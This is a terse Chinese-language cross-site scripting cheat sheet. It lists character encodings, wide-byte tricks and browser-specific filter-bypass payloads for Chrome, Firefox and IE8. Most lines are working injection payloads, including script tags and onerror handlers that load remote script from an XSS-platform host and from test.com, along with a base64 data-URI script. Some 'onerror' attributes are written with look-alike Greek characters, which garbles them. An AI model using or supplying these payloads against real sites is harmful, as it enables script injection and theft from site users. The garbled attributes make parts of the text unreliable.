html特殊編碼
< <
> >
" "
' '
\ \
/ /
- 先加'"></\測試看過濾情況。
innerHTML
\沒有過濾
<可以表示爲\u003c 或\x3c
>可以表示爲\u003e 或\x3e
空格 \u0020 或 \x20
分隔符可以試試/**/
\反斜槓有時候可以轉義正常語句,改變語句的執行。
如果gbxxx系列字符集可嘗試寬字節
雙引號表示爲%c0%22
\ %c0%5c(後三位是表示字符)
前半個字符被解釋錯誤,後半個字符解釋出想要的結果;
換行符:%0a
josn:http://www.w3school.com.cn/json/json_syntax.asp
過chrome
<!--<img src="--><img src=x οnerrοr=alert(1)//">
"><svg><script xlink:href=//********></script> chrome的bypass
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=">click<a>
過fiefox
"><script src=http://xsser.me/*****></script>
過IE
IE8 xss filter bypass (xss過濾器繞過)
οnerrοr="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"
新標籤
<isindex type=image src=1 οnerrοr=alert(1)>
